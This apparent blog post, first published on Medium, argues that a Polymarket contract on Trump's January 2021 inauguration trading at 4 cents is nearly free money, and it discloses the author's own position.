If you answered "No" to that question, then head on over to Polymarket where this contract is still trading for 4c, a week before Inauguration day. That's 208% annualized. Note that the Biden contract is trading at 88c at the time of this writing, meaning that there is an 8% probability assigned that neither gets inaugurated on January 20th. That is too high in my opinion, but shows prudent market pricing. That said, I am willing to bet a large sum that Trump will NOT get inaugurated on January 20th. (disclosure: I do own a substantial amount of the first market).

Yes, there is a chance that what we witnessed last week will repeat itself next week. I cannot mathematically quantify that probability, however what I can safely say, is that any disruption to the Inauguration ceremonies will effectively result in zero chances of Trump's inauguration.

4% seems too high of a price for something that cannot be achieved without having a coup d'éta on the American presidency.

If you think there must be a catch, I have not been able to find one. Up until second week of December several prediction markets were still pricing Trump to win the US Election (yes, you read that right, a full month AFTER the election took place).

Here is PredictIt's market on the US presidency that traded all the way to December 18th. It finally settled but never went above 95c until all the states certified the election.

Why is there an (almost) in the title? Because there is always credit risk in any financial transaction, so are transaction costs. There's never any free money, but right now this is as close as I can find it.

This is not investment advice. All opinions are my own, and you should do your own due diligence, as always.

This article was first published on Medium.